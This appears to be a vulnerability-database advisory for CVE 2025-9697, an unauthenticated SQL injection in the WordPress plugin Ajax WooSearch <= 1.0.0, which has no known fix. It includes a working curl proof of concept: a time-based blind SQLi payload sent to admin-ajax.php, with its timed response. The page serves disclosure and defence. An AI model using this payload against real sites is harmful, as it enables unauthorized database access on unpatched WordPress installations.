Ajax WooSearch <= 1.0.0 – Unauthenticated SQL Injection | CVE 2025-9697 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

curl -s -o /dev/null -w "\nTime: %{time_total} seconds\n" \
-X POST "https://example.com/wp-admin/admin-ajax.php?action=woos_search_product_action" \
-d "keyword=1" \
-d "category=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"

Example Response:
Time: 11.061436 seconds

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Khaled Alenazi (Nxploited)

Submitter

Khaled Alenazi (Nxploited)

Submitter website

https://github.com/nxploited

Verified

Yes

WPVDB ID

38939152-e54e-4f8f-996b-592de195570d

Timeline

Publicly Published

2025-09-11 (about 3 months ago)

Added

2025-09-11 (about 3 months ago)

Last Updated

2025-09-25 (about 3 months ago)

Other

Published

Title

Published

2021-08-22

Title

MicroCopy <= 1.1.0 - Authenticated SQL Injection

Published

2025-06-05

Title

WP-Addpub <= 1.2.8 - Authenticated (Contributor+) SQL Injection

Published

2022-04-25

Title

3xSocializer <= 0.98.22 - Subscriber+ SQLi

Published

2021-10-18

Title

SEO Redirection < 8.2 - Subscriber+ SQL Injection

Published

2024-03-21

Title

Easy Property Listings < 3.5.3 - Authenticated(Contributor+) SQL Injection via Shortcode